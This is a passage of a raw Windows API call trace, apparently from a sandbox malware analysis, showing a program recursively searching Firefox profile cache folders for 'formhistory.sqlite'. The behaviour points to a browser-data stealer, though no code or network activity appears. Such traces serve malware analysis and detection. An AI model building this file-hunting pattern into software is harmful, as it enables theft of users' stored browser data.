(lpString="\\") returned 1 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\49") returned 84 [0591.153] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.153] lstrlenW (lpString="38779d01") returned 8 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\49\\") returned 85 [0591.153] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4bb8 [0591.153] LocalFree (hMem=0x2edc700) returned 0x0 [0591.153] StrStrIW (lpFirst="38779d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.153] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.153] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.153] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.153] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.153] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.153] lstrcmpiW (lpString1="8D", lpString2=".") returned 1 [0591.153] lstrcmpiW (lpString1="8D", lpString2="..") returned 1 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.153] lstrlenW (lpString="\\") returned 1 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.153] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.153] lstrlenW (lpString="8D") returned 2 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.153] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.153] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\8D") returned 84 [0591.153] lstrlenW (lpString="\\*.*") returned 4 [0591.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\8D") returned 84 [0591.153] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.153] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\8D\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.153] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.153] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.154] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.154] lstrlenW (lpString="\\") returned 1 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\8D") returned 84 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.154] lstrlenW (lpString="2B984d01") returned 8 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\8D\\") returned 85 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4d00 [0591.154] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.154] StrStrIW (lpFirst="2B984d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.154] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.154] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.154] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.154] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.154] lstrcmpiW (lpString1="E0", lpString2=".") returned 1 [0591.154] lstrcmpiW (lpString1="E0", lpString2="..") returned 1 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.154] lstrlenW (lpString="\\") returned 1 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.154] lstrlenW (lpString="E0") returned 2 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.154] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\E0\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.154] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.154] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.154] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.154] lstrlenW (lpString="\\") returned 1 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\E0") returned 84 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.154] lstrlenW (lpString="F17B2d01") returned 8 [0591.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\E0\\") returned 85 [0591.154] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4e48 [0591.154] StrStrIW (lpFirst="F17B2d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.154] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.154] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.154] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.154] lstrcmpiW (lpString1="FD", lpString2=".") returned 1 [0591.154] lstrcmpiW (lpString1="FD", lpString2="..") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.155] lstrlenW (lpString="\\") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9") returned 81 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.155] lstrlenW (lpString="FD") returned 2 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\") returned 82 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.155] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\FD\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.155] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.155] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.155] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.155] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.155] lstrlenW (lpString="\\") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\FD") returned 84 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.155] lstrlenW (lpString="57344d01") returned 8 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\9\\FD\\") returned 85 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4f90 [0591.155] StrStrIW (lpFirst="57344d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.155] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.155] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.155] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.155] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.155] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.155] lstrcmpiW (lpString1="A", lpString2=".") returned 1 [0591.155] lstrcmpiW (lpString1="A", lpString2="..") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.155] lstrlenW (lpString="\\") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.155] lstrlenW (lpString="A") returned 1 [0591.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.155] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.155] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.156] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.156] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.156] lstrcmpiW (lpString1="AE", lpString2=".") returned 1 [0591.156] lstrcmpiW (lpString1="AE", lpString2="..") returned 1 [0591.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A") returned 81 [0591.156] lstrlenW (lpString="\\") returned 1 [0591.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A") returned 81 [0591.156] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.156] lstrlenW (lpString="AE") returned 2 [0591.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A\\") returned 82 [0591.156] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.156] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A\\AE\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.157] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.157] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.157] lstrlenW (lpString="\\") returned 1 [0591.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A\\AE") returned 84 [0591.157] StrStrIW (lpFirst="CF1AEd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.157] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.157] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.157] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.157] lstrcmpiW (lpString1="CE", lpString2=".") returned 1 [0591.157] lstrcmpiW (lpString1="CE", lpString2="..") returned 1 [0591.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A") returned 81 [0591.157] lstrlenW (lpString="\\") returned 1 [0591.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A") returned 81 [0591.157] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\A\\CE\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.157] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.158] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.158] StrStrIW (lpFirst="65483d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.158] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.158] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.158] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.158] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.158] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.158] lstrcmpiW (lpString1="B", lpString2=".") returned 1 [0591.158] lstrcmpiW (lpString1="B", lpString2="..") returned 1 [0591.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.158] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.158] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.158] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.158] lstrcmpiW (lpString1="35", lpString2=".") returned 1 [0591.158] lstrcmpiW (lpString1="35", lpString2="..") returned 1 [0591.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B") returned 81 [0591.158] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\35\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.158] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.158] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.158] StrStrIW (lpFirst="D456Ed01", lpSrch="formhistory.sqlite") returned 0x0 [0591.158] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.158] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.159] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.159] lstrcmpiW (lpString1="3E", lpString2=".") returned 1 [0591.159] lstrcmpiW (lpString1="3E", lpString2="..") returned 1 [0591.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B") returned 81 [0591.159] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\3E\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.159] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.159] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.159] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.159] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.159] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.159] StrStrIW (lpFirst="50FD5d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.159] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.159] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.159] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.159] lstrcmpiW (lpString1="64", lpString2=".") returned 1 [0591.159] lstrcmpiW (lpString1="64", lpString2="..") returned 1 [0591.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B") returned 81 [0591.159] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\64\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.160] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.160] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.160] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.160] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.160] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.160] StrStrIW (lpFirst="37ABBd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.160] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.160] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.160] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.160] lstrcmpiW (lpString1="89", lpString2=".") returned 1 [0591.160] lstrcmpiW (lpString1="89", lpString2="..") returned 1 [0591.160] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B") returned 81 [0591.160] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\89\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.161] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.161] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.161] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.161] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.161] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.161] StrStrIW (lpFirst="10CF4d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.161] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.161] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.161] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.161] lstrcmpiW (lpString1="E5", lpString2=".") returned 1 [0591.161] lstrcmpiW (lpString1="E5", lpString2="..") returned 1 [0591.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B") returned 81 [0591.161] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\B\\E5\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.162] StrStrIW (lpFirst="9A8D1d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.162] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.162] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.162] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.162] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.162] lstrcmpiW (lpString1="C", lpString2=".") returned 1 [0591.162] lstrcmpiW (lpString1="C", lpString2="..") returned 1 [0591.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.162] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\C\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.162] lstrcmpiW (lpString1="1F", lpString2=".") returned 1 [0591.162] lstrcmpiW (lpString1="1F", lpString2="..") returned 1 [0591.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\C") returned 81 [0591.162] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\C\\1F\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.162] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.163] StrStrIW (lpFirst="7ADBDd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.163] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.163] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.163] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.163] lstrcmpiW (lpString1="55", lpString2=".") returned 1 [0591.163] lstrcmpiW (lpString1="55", lpString2="..") returned 1 [0591.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\C") returned 81 [0591.163] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\C\\55\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.163] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.163] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.163] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.163] StrStrIW (lpFirst="BF060d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.163] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.163] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.163] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.163] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.163] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.163] lstrcmpiW (lpString1="D", lpString2=".") returned 1 [0591.163] lstrcmpiW (lpString1="D", lpString2="..") returned 1 [0591.163] lstrlenW 